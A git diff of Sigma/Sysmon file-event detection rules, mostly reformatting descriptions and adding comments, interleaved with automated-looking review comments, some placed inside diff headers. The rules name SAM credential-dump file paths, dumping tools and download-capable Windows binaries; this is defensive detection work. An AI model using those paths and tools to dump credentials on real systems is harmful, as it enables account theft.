a/sigma/sysmon/file/file_event/file_event_win_sam_dump.yml b/sigma/sysmon/file/file_event/file_event_win_sam_dump.yml index 1588fe7ce..04e61d035 100644 --- a/sigma/sysmon/file/file_event/file_event_win_sam_dump.yml +++ b/sigma/sysmon/file/file_event/file_event_win_sam_dump.yml 
@@ -1,8 +1,7 @@ title: Potential SAM Database Dump id: 4e87b8e2-2ee9-4b2a-a715-4727d297ece0 status: test -description: Detects the creation of files that look like exports of the local SAM - (Security Account Manager) +description: Detects the creation of files that look like exports of the local SAM (Security Account Manager) references: - https://github.com/search?q=CVE-2021-36934 - https://github.com/cube0x0/CVE-2021-36934 @@ -24,27 +23,27 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: - - TargetFilename|endswith: - - \Temp\sam - - \sam.sav - - \Intel\sam - - \sam.hive - - \Perflogs\sam - - \ProgramData\sam - - \Users\Public\sam - - \AppData\Local\sam - - \AppData\Roaming\sam - - _ShadowSteal.zip - - \Documents\SAM.export - - :\sam - - TargetFilename|contains: - - \hive_sam_ - - \sam.save - - \sam.export - - \~reg_sam.save - - \sam_backup - - \sam.bck - - \sam.backup + - TargetFilename|endswith: + - \Temp\sam + - \sam.sav + - \Intel\sam + - \sam.hive + - \Perflogs\sam + - \ProgramData\sam + - \Users\Public\sam + - \AppData\Local\sam + - \AppData\Roaming\sam + - _ShadowSteal.zip # https://github.com/HuskyHacks/ShadowSteal + - \Documents\SAM.export # https://github.com/n3tsurge/CVE-2021-36934/ + - :\sam + - TargetFilename|contains: + - \hive_sam_ # https://github.com/FireFart/hivenightmare + - \sam.save + - \sam.export + - \~reg_sam.save + - \sam_backup + - \sam.bck + - \sam.backup condition: file_event and selection falsepositives: - Rare cases of administrative activity diff --git a/sigma/sysmon/file/file_event/file_event_win_shell_write_susp_directory.yml b/sigma/sysmon/file/file_event/file_event_win_shell_write_susp_directory.yml index fd277ee83..d7083d07d 100644 --- a/sigma/sysmon/file/file_event/file_event_win_shell_write_susp_directory.yml +++ b/sigma/sysmon/file/file_event/file_event_win_shell_write_susp_directory.yml 
@@ -1,8 +1,7 @@ title: Windows Shell/Scripting Application File Write to Suspicious Folder id: 1277f594-a7d1-4f28-a2d3-73af5cbeab43 status: experimental -description: Detects Windows shells and scripting applications that write files to - suspicious folders +description: Detects Windows shells and scripting applications that write files to suspicious folders references: - Internal Research author: Florian Roth (Nextron Systems) @@ -24,7 +23,7 @@ detection: - \bash.exe - \cmd.exe - \cscript.exe - - \msbuild.exe + - \msbuild.exe # https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml - \powershell.exe - \pwsh.exe - \sh.exe @@ -37,9 +36,10 @@ detection: - \certutil.exe - \forfiles.exe - \mshta.exe + # - '\rundll32.exe' # Potential FP - \schtasks.exe - \scriptrunner.exe - - \wmic.exe + - \wmic.exe # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ TargetFilename|contains: - C:\PerfLogs\ - C:\Users\Public\ diff --git a/sigma/sysmon/file/file_event/file_event_win_shell_write_susp_files_extensions.yml b/sigma/sysmon/file/file_event/file_event_win_shell_write_susp_files_extensions.yml index b13174750..c9f529824 100644 --- a/sigma/sysmon/file/file_event/file_event_win_shell_write_susp_files_extensions.yml +++ b/sigma/sysmon/file/file_event/file_event_win_shell_write_susp_files_extensions.yml @@ -1,8 +1,8 @@ title: Windows Binaries Write Suspicious Extensions id: b8fd0e93-ff58-4cbd-8f48-1c114e342e62 related: - - id: 1277f594-a7d1-4f28-a2d3-73af5cbeab43 - type: derived + - id: 1277f594-a7d1-4f28-a2d3-73af5cbeab43 + type: derived status: experimental description: Detects Windows executables that writes files with suspicious extensions references: diff --git a/sigma/sysmon/file/file_event/file_event_win_startup_folder_file_write.yml b/sigma/sysmon/file/file_event/file_event_win_startup_folder_file_write.yml index 5f0629eb9..68db522e9 100644 
--- a/sigma/sysmon/file/file_event/file_event_win_startup_folder_file_write.yml +++ b/sigma/sysmon/file/file_event/file_event_win_startup_folder_file_write.yml @@ -1,11 +1,10 @@ title: Startup Folder File Write id: 2aa0a6b4-a865-495b-ab51-c28249537b75 related: - - id: 28208707-fe31-437f-9a7f-4b1108b94d2e - type: similar + - id: 28208707-fe31-437f-9a7f-4b1108b94d2e + type: similar status: test -description: A General detection for files being created in the Windows startup directory. - This could be an indicator of persistence. +description: A General detection for files being created in the Windows startup directory. This could be an indicator of persistence. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/12 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.md @@ -26,12 +25,10 @@ detection: selection: TargetFilename|contains: \Microsoft\Windows\Start Menu\Programs\StartUp filter_update: - - Image: C:\Windows\System32\wuauclt.exe - - TargetFilename|startswith: C:\$WINDOWS.~BT\NewOS\ + - Image: C:\Windows\System32\wuauclt.exe + - TargetFilename|startswith: C:\$WINDOWS.~BT\NewOS\ condition: file_event and (selection and not filter_update) falsepositives: - - FP could be caused by legitimate application writing shortcuts for example. - This folder should always be inspected to make sure that all the files in - there are legitimate + - FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate level: medium ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_default_gpo_dir_write.yml b/sigma/sysmon/file/file_event/file_event_win_susp_default_gpo_dir_write.yml index a7b84e24f..2fe206ca4 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_default_gpo_dir_write.yml 
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_default_gpo_dir_write.yml @@ -1,8 +1,7 @@ title: Suspicious Files in Default GPO Folder id: 5f87308a-0a5b-4623-ae15-d8fa1809bc60 status: test -description: Detects the creation of copy of suspicious files (EXE/DLL) to the default - GPO storage folder +description: Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder references: - https://redcanary.com/blog/intelligence-insights-november-2021/ author: elhoim diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_desktop_ini.yml b/sigma/sysmon/file/file_event/file_event_win_susp_desktop_ini.yml index f9d0117f7..18aacda5e 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_desktop_ini.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_desktop_ini.yml @@ -1,9 +1,7 @@ title: Suspicious desktop.ini Action id: 81315b50-6b60-4d8f-9928-3466e1022515 status: test -description: Detects unusual processes accessing desktop.ini, which can be leveraged - to alter how Explorer displays a folder's content (i.e. renaming files) without - changing them on disk. +description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. references: - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO) diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml b/sigma/sysmon/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml index d9b5058ef..d710b3f09 100644 --- a/sigma/sysmon/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml +++ b/sigma/sysmon/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml 
@@ -1,8 +1,7 @@
title: Suspicious Desktopimgdownldr Target File
id: fc4f4817-0c53-4683-a4ee-b17a64bc1039
status: test
-description: Detects a suspicious Microsoft desktopimgdownldr file creation that stores
- a file to a suspicious location or contains a file with a suspicious extension
+description: Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension
references:
- https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
- https://twitter.com/SBousseaden/status/1278977301745741825
@@ -35,7 +34,6 @@ fields:
- CommandLine
- ParentCommandLine
falsepositives:
- - False positives depend on scripts and administrative tools used in the monitored
- environment
+ - False positives depend on scripts and administrative tools used in the monitored environment
level: high
ruletype: Sigma
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_diagcab.yml b/sigma/sysmon/file/file_event/file_event_win_susp_diagcab.yml
index d1301fffd..4c9e22f6a 100644
--- a/sigma/sysmon/file/file_event/file_event_win_susp_diagcab.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_diagcab.yml
@@ -1,8 +1,7 @@
title: Creation of a Diagcab
id: 3d0ed417-3d94-4963-a562-4a92c940656a
status: test
-description: Detects the creation of diagcab file, which could be caused by some legitimate
- installer or is a sign of exploitation (review the filename and its location)
+description: Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)
references:
- https://threadreaderapp.com/thread/1533879688141086720.html
author: frack113
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_double_extension.yml b/sigma/sysmon/file/file_event/file_event_win_susp_double_extension.yml
index b550bcd0c..58ef89b25 100644
--- a/sigma/sysmon/file/file_event/file_event_win_susp_double_extension.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_double_extension.yml
@@ -1,14 +1,12 @@
title: Suspicious Double Extension Files
id: b4926b47-a9d7-434c-b3a0-adc3fa0bd13e
related:
- - id: 1cdd9a09-06c9-4769-99ff-626e2b3991b8
- type: derived
- - id: 3215aa19-f060-4332-86d5-5602511f3ca8
- type: similar
+ - id: 1cdd9a09-06c9-4769-99ff-626e2b3991b8
+ type: derived
+ - id: 3215aa19-f060-4332-86d5-5602511f3ca8
+ type: similar
status: test
-description: Detects dropped files with double extensions, which is often used by
- malware as a method to abuse the fact that Windows hide default extensions by
- default.
+description: Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default.
references:
- https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/
- https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations
@@ -33,6 +31,7 @@ detection:
TargetFilename|endswith:
- .exe
- .iso
+ # - '.lnk' # legitimate links can happen just anywhere
- .rar
- .zip
TargetFilename|contains:
@@ -48,6 +47,11 @@ detection:
TargetFilename|endswith:
- .rar.exe
- .zip.exe
+ # Note: If you wanna keep using the ".lnk" extension. You might uncomment this filter and add additional locations
+ # filter_main_lnk:
+ # TargetFilename|contains:
+ # - '\AppData\Roaming\Microsoft\Office\Recent\'
+ # - '\AppData\Roaming\Microsoft\Windows\Recent\'
condition: file_event and (1 of selection_*)
falsepositives:
- Unlikely
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_exchange_aspx_write.yml b/sigma/sysmon/file/file_event/file_event_win_susp_exchange_aspx_write.yml
index abcfc9257..67b8be2e4 100644
--- a/sigma/sysmon/file/file_event/file_event_win_susp_exchange_aspx_write.yml
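Review bot: The commented-out `filter_main_lnk` block added in the second hunk would have no effect even if a user uncomments it, because the condition on the line below is still `condition: file_event and (1 of selection_*)` and never references a `filter_main_*` selection. Anyone following the note's advice ("uncomment this filter") would re-enable `.lnk` matching without any exclusion, so the note should either state that the condition must also be changed to `condition: file_event and (1 of selection_* and not 1 of filter_main_*)` or that change should ship as a commented line next to the filter. The `'.lnk'` entry in the first hunk is also quoted while every neighbouring extension is bare; keeping one form makes the list easier to scan.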
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_exchange_aspx_write.yml
@@ -1,9 +1,7 @@
title: Suspicious MSExchangeMailboxReplication ASPX Write
id: 7280c9f3-a5af-45d0-916a-bc01cb4151c9
status: test
-description: Detects suspicious activity in which the MSExchangeMailboxReplication
- process writes .asp and .apsx files to disk, which could be a sign of ProxyShell
- exploitation
+description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
references:
- https://redcanary.com/blog/blackbyte-ransomware/
author: Florian Roth (Nextron Systems)
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_executable_creation.yml b/sigma/sysmon/file/file_event/file_event_win_susp_executable_creation.yml
index 1b6d6df5d..9a9c9e14e 100644
--- a/sigma/sysmon/file/file_event/file_event_win_susp_executable_creation.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_executable_creation.yml
@@ -1,9 +1,7 @@
title: Suspicious Executable File Creation
id: 74babdd6-a758-4549-9632-26535279e654
status: test
-description: Detect creation of suspicious executable file name. Some strings look
- for suspicious file extensions, others look for filenames that exploit unquoted
- service paths.
+description: Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
references:
- https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae
- https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_get_variable.yml b/sigma/sysmon/file/file_event/file_event_win_susp_get_variable.yml
index 53d45b844..93dce1e65 100644
--- a/sigma/sysmon/file/file_event/file_event_win_susp_get_variable.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_get_variable.yml
@@ -1,15 +1,10 @@
title: Suspicious Get-Variable.exe Creation
id: 0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b
status: test
-description: 'Get-Variable is a valid PowerShell cmdlet
-
+description: |
+ Get-Variable is a valid PowerShell cmdlet
WindowsApps is by default in the path where PowerShell is executed.
-
- So when the Get-Variable command is issued on PowerShell execution, the system
- first looks for the Get-Variable executable in the path and executes the malicious
- binary instead of looking for the PowerShell cmdlet.
-
- '
+ So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.
references:
- https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/
- https://www.joesandbox.com/analysis/465533/0/html
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_hidden_dir_index_allocation.yml b/sigma/sysmon/file/file_event/file_event_win_susp_hidden_dir_index_allocation.yml
index 68fdc0c7a..7982ac593 100644
--- a/sigma/sysmon/file/file_event/file_event_win_susp_hidden_dir_index_allocation.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_hidden_dir_index_allocation.yml
@@ -1,14 +1,11 @@
title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream
id: a8f866e1-bdd4-425e-a27a-37619238d9c7
related:
- - id: 0900463c-b33b-49a8-be1d-552a3b553dae
- type: similar
+ - id: 0900463c-b33b-49a8-be1d-552a3b553dae
+ type: similar
status: experimental
-description: 'Detects the creation of hidden file/folder with the "::$index_allocation"
- stream. Which can be used as a technique to prevent access to folder and files
- from tooling such as "explorer.exe" and "powershell.exe"
-
- '
+description: |
+ Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe"
references:
- https://twitter.com/pfiatde/status/1681977680688738305
- https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/
@@ -29,6 +26,7 @@ detection:
EventID: 11
Channel: Microsoft-Windows-Sysmon/Operational
selection:
+ # Note: Both Sysmon and ETW are unable to log the presence of such streams in the CommandLine. But EDRs such as Crowdstrike are able to use e.g. CMD console history. Users are advised to test this before usage
TargetFilename|contains: ::$index_allocation
condition: file_event and selection
falsepositives:
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_homoglyph_filename.yml b/sigma/sysmon/file/file_event/file_event_win_susp_homoglyph_filename.yml
index 30daba719..8a6e94fb3 100644
--- a/sigma/sysmon/file/file_event/file_event_win_susp_homoglyph_filename.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_homoglyph_filename.yml
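Review bot: The note added above `TargetFilename|contains: ::$index_allocation` in the second hunk talks about the stream not being visible in the CommandLine, but this is a file_event rule (EventID 11) that matches on TargetFilename, so the sentence does not describe a limitation of this rule. It reads as if carried over from the related rule listed under `related` (presumably the process_creation variant); as written, a reader may conclude this rule is unreliable when the caveat concerns command-line logging only. Suggested wording: `# Note: Command-line logging (Sysmon/ETW) does not show these streams, so the file_event TargetFilename is the field to rely on; see the related process_creation rule for the command-line caveat and EDR alternatives`.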
@@ -1,16 +1,10 @@
title: Potential Homoglyph Attack Using Lookalike Characters in Filename
id: 4f1707b1-b50b-45b4-b5a2-3978b5a5d0d6
status: experimental
-description: 'Detects the presence of unicode characters which are homoglyphs, or
- identical in appearance, to ASCII letter characters.
-
- This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs
- are included; these are characters that
-
- are indistinguishable from ASCII characters and thus may make excellent candidates
- for homoglyph attack characters.
-
- '
+description: |
+ Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
+ This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
+ are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
references:
- https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish
- http://www.irongeek.com/homoglyph-attack-generator.php
@@ -20,6 +14,7 @@ tags:
- attack.defense_evasion
- attack.t1036
- attack.t1036.003
+ # - attack.t1036.008
- sysmon
logsource:
category: file_event
@@ -30,59 +25,58 @@ detection:
Channel: Microsoft-Windows-Sysmon/Operational
selection_upper:
TargetFilename|contains:
- - "\u0410"
- - "\u0412"
- - "\u0415"
- - "\u041A"
- - "\u041C"
- - "\u041D"
- - "\u041E"
- - "\u0420"
- - "\u0421"
- - "\u0422"
- - "\u0425"
- - "\u0405"
- - "\u0406"
- - "\u0408"
- - "\u04AE"
- - "\u04C0"
- - "\u050C"
- - "\u051A"
- - "\u051C"
- - "\u0391"
- - "\u0392"
- - "\u0395"
- - "\u0396"
- - "\u0397"
- - "\u0399"
- - "\u039A"
- - "\u039C"
- - "\u039D"
- - "\u039F"
- - "\u03A1"
- - "\u03A4"
- - "\u03A5"
- - "\u03A7"
+ - А # А/A
+ - В # В/B
+ - Е # Е/E
+ - К # К/K
+ - М # М/M
+ - Н # Н/H
+ - О # О/O
+ - Р # Р/P
+ - С # С/C
+ - Т # Т/T
+ - Х # Х/X
+ - Ѕ # Ѕ/S
+ - І # І/I
+ - Ј # Ј/J
+ - Ү # Ү/Y
+ - Ӏ # Ӏ/I
+ - Ԍ # Ԍ/G
+ - Ԛ # Ԛ/Q
+ - Ԝ # Ԝ/W
+ - Α # Α/A
+ - Β # Β/B
+ - Ε # Ε/E
+ - Ζ # Ζ/Z
+ - Η # Η/H
+ - Ι # Ι/I
+ - Κ # Κ/K
+ - Μ # Μ/M
+ - Ν # Ν/N
+ - Ο # Ο/O
+ - Ρ # Ρ/P
+ - Τ # Τ/T
+ - Υ # Υ/Y
+ - Χ # Χ/X
selection_lower:
TargetFilename|contains:
- - "\u0430"
- - "\u0435"
- - "\u043E"
- - "\u0440"
- - "\u0441"
- - "\u0445"
- - "\u0455"
- - "\u0456"
- - "\u04CF"
- - "\u0458"
- - "\u04BB"
- - "\u0501"
- - "\u051B"
- - "\u051D"
- - "\u03BF"
+ - а # а/a
+ - е # е/e
+ - о # о/o
+ - р # р/p
+ - с # с/c
+ - х # х/x
+ - ѕ # ѕ/s
+ - і # і/i
+ - ӏ # ӏ/l
+ - ј # ј/j
+ - һ # һ/h
+ - ԁ # ԁ/d
+ - ԛ # ԛ/q
+ - ԝ # ԝ/w
+ - ο # ο/o
condition: file_event and (1 of selection_*)
falsepositives:
- - File names with legitimate Cyrillic text. Will likely require tuning (or not
- be usable) in countries where these alphabets are in use.
+ - File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use.
level: medium
ruletype: Sigma
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_archive.yml b/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_archive.yml
index 533bd844f..8c6ee9f60 100644
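Review bot: Replacing the `"\uXXXX"` escapes with bare Cyrillic and Greek scalars makes the match values depend on every consumer reading this file as UTF-8, and a character that has been normalised, transcoded or mis-pasted is indistinguishable by eye from the intended one, whereas the old ASCII-only form was self-checking. The `# А/A` trailing comments help a reviewer, but they are themselves the same non-ASCII character, so they cannot reveal a substitution. If the bare form is kept, a short comment at the top of `selection_upper` such as `# Each entry is a single non-ASCII code point; keep the file UTF-8 and do not let editors normalise it` plus a lint step that checks each entry is exactly one code point outside ASCII would restore the safety the escapes gave. Note also that the lowercase `ӏ` is annotated as `l` while the uppercase `Ӏ` is annotated as `I`; both are fine, but the asymmetry is worth a word in the comment so nobody "fixes" it.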
--- a/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_archive.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_archive.yml
@@ -1,8 +1,7 @@
title: Legitimate Application Dropped Archive
id: 654fcc6d-840d-4844-9b07-2c3300e54a26
status: test
-description: Detects programs on a Windows system that should not write an archive
- to disk
+description: Detects programs on a Windows system that should not write an archive to disk
references:
- https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326
author: frack113, Florian Roth
@@ -20,6 +19,7 @@ detection:
Channel: Microsoft-Windows-Sysmon/Operational
selection:
Image|endswith:
+ # Microsoft Office Programs Dropping Executables
- \winword.exe
- \excel.exe
- \powerpnt.exe
@@ -29,12 +29,16 @@ detection:
- \visio.exe
- \wordpad.exe
- \wordview.exe
+ # LOLBINs that can be used to download executables
- \certutil.exe
- \certoc.exe
- \CertReq.exe
+ # - \bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env)
- \Desktopimgdownldr.exe
- \esentutl.exe
+ # - \expand.exe
- \finger.exe
+ # Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name)
- \notepad.exe
- \AcroRd32.exe
- \RdrCEF.exe
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_exe.yml b/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_exe.yml
index 6fb182dd0..83229a783 100644
--- a/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_exe.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_exe.yml
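Review bot: The section comments added to the `Image|endswith` list in this archive rule say "Dropping Executables", "download executables" and "should never drop an executable to disk", but the rule (title and description) is about archives being written, so the comments describe a different rule's intent. The same executable-oriented text is reused in the script rule at the next-but-one file (file_event_win_susp_legitimate_app_dropping_script.yml). In this file the first comment should read `# Microsoft Office programs that should not drop archives` and the last `# Executables that should never drop an archive to disk (...)`, with the script rule adjusted to say "scripts" in the same places.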
@@ -1,8 +1,7 @@
title: Legitimate Application Dropped Executable
id: f0540f7e-2db3-4432-b9e0-3965486744bc
status: experimental
-description: Detects programs on a Windows system that should not write executables
- to disk
+description: Detects programs on a Windows system that should not write executables to disk
references:
- https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326
author: frack113, Florian Roth (Nextron Systems)
@@ -21,15 +20,20 @@ detection:
Channel: Microsoft-Windows-Sysmon/Operational
selection:
Image|endswith:
+ # Microsoft Office Programs Dropping Executables / Rest of the apps are covered in: c7a74c80-ba5a-486e-9974-ab9e682bc5e4
- \eqnedt32.exe
- \wordpad.exe
- \wordview.exe
+ # LOLBINs that can be used to download executables
- \certutil.exe
- \certoc.exe
- \CertReq.exe
+ # - \bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env)
- \Desktopimgdownldr.exe
- \esentutl.exe
+ # - \expand.exe
- \mshta.exe
+ # Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name)
- \AcroRd32.exe
- \RdrCEF.exe
- \hh.exe
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_script.yml b/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_script.yml
index 110c8bc4d..631034c0e 100644
--- a/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_script.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_script.yml
@@ -1,8 +1,7 @@
title: Legitimate Application Dropped Script
id: 7d604714-e071-49ff-8726-edeb95a70679
status: experimental
-description: Detects programs on a Windows system that should not write scripts to
- disk
+description: Detects programs on a Windows system that should not write scripts to disk
references:
- https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326
author: frack113, Florian Roth (Nextron Systems)
@@ -21,15 +20,20 @@ detection:
Channel: Microsoft-Windows-Sysmon/Operational
selection:
Image|endswith:
+ # Microsoft Office Programs Dropping Executables / Rest of the apps are covered in: c7a74c80-ba5a-486e-9974-ab9e682bc5e4
- \eqnedt32.exe
- \wordpad.exe
- \wordview.exe
+ # LOLBINs that can be used to download executables
- \certutil.exe
- \certoc.exe
- \CertReq.exe
+ # - \bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env)
- \Desktopimgdownldr.exe
- \esentutl.exe
+ # - \expand.exe
- \mshta.exe
+ # Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name)
- \AcroRd32.exe
- \RdrCEF.exe
- \hh.exe
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_lnk_double_extension.yml b/sigma/sysmon/file/file_event/file_event_win_susp_lnk_double_extension.yml
index 63f75bc41..897d85671 100644
--- a/sigma/sysmon/file/file_event/file_event_win_susp_lnk_double_extension.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_lnk_double_extension.yml
@@ -1,14 +1,11 @@
title: Suspicious LNK Double Extension File Created
id: 3215aa19-f060-4332-86d5-5602511f3ca8
related:
- - id: b4926b47-a9d7-434c-b3a0-adc3fa0bd13e
- type: derived
+ - id: b4926b47-a9d7-434c-b3a0-adc3fa0bd13e
+ type: derived
status: experimental
-description: 'Detects the creation of files with an "LNK" as a second extension. This
- is sometimes used by malware as a method to abuse the fact that Windows hides
- the "LNK" extension by default.
-
- '
+description: |
+ Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
references:
- https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/
- https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations
@@ -44,6 +41,7 @@ detection:
TargetFilename|contains: \AppData\Roaming\Microsoft\Windows\Recent\
filter_optional_office_recent:
Image|endswith:
+ # Note: Some additional office application might need to be added
- \excel.exe
- \powerpnt.exe
- \winword.exe
@@ -59,7 +57,6 @@ detection:
TargetFilename|contains: \AppData\Roaming\Microsoft\Word
condition: file_event and (selection and not 1 of filter_main_* and not 1 of filter_optional_*)
falsepositives:
- - Some tuning is required for other general purpose directories of third party
- apps
+ - Some tuning is required for other general purpose directories of third party apps
level: medium
ruletype: Sigma
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_pfx_file_creation.yml b/sigma/sysmon/file/file_event/file_event_win_susp_pfx_file_creation.yml
index 682df15fe..09545cfd4 100644
--- a/sigma/sysmon/file/file_event/file_event_win_susp_pfx_file_creation.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_pfx_file_creation.yml
@@ -1,8 +1,7 @@
title: Suspicious PFX File Creation
id: dca1b3e8-e043-4ec8-85d7-867f334b5724
status: test
-description: A general detection for processes creating PFX files. This could be an
- indicator of an adversary exporting a local certificate to a PFX file.
+description: A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.
references:
- https://github.com/OTRF/detection-hackathon-apt29/issues/14
- https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.md
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_powershell_profile.yml b/sigma/sysmon/file/file_event/file_event_win_susp_powershell_profile.yml
index 223164a00..0106282cc 100644
--- a/sigma/sysmon/file/file_event/file_event_win_susp_powershell_profile.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_powershell_profile.yml
@@ -1,8 +1,7 @@
title: PowerShell Profile Modification
id: b5b78988-486d-4a80-b991-930eff3ff8bf
status: test
-description: Detects the creation or modification of a powershell profile which could
- indicate suspicious activity as the profile can be used as a mean of persistence
+description: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
references:
- https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/
- https://persistence-info.github.io/Data/powershellprofile.html
diff --git a/sigma/sysmon/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml b/sigma/sysmon/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml
index cbd46f715..d9b96550e 100644
--- a/sigma/sysmon/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml
@@ -1,14 +1,9 @@
title: Suspicious PROCEXP152.sys File Created In TMP
id: 3da70954-0f2c-4103-adff-b7440368f50e
status: test
-description: 'Detects the creation of the PROCEXP152.sys file in the application-data
- local temporary folder.
-
- This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU)
- or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses
- KDU.
-
- '
+description: |
+ Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.
